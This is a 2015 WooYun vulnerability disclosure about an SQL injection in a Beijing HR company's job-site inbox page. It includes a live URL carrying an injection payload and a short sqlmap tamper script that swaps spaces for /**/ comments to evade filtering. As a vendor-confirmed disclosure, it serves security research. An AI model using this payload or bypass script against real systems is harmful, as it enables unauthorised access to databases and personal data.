当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091162

漏洞标题:北京外企人力sql注入

相关厂商:北京外企人力资源服务有限公司

漏洞作者: greensoul

提交时间:2015-01-12 10:52

修复时间:2015-02-26 10:54

公开时间:2015-02-26 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-13: 厂商已经确认,细节仅向厂商公开
2015-01-23: 细节向核心白帽子及相关领域专家公开
2015-02-02: 细节向普通白帽子公开
2015-02-12: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

招聘求职处存有一处sql注入漏洞

详细说明:

企业用户的收件箱存在sql注入漏洞

http://job.fesco.com.cn/company/Com_ReadBox.asp?param=1%20or%201=1%20and%20--%20


漏洞证明:

在注入过程中遇到空格会被拒绝的情况,使用了sqlmap自带的绕过脚本space2hash.py和space2morehash.py无效.于是自己修改了下.

#!/usr/bin/env python
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        for i in xrange(len(payload)):
            if payload[i].isspace():
                retVal += "/**/"
            else:
                retVal += payload[i]
    return retVal


QQ图片20150111020624.png


QQ图片20150111020617.jpg

修复方案:

讲多无谓

版权声明:转载请注明来源 greensoul@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-13 18:01

厂商回复:

谢谢您的监督与发现,我们已让工程师进行了处理,谢谢~~~

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-23 11:02 | 北京外企人力资源服务有限公司(乌云厂商)

    这位白帽子能否私信我一下?多谢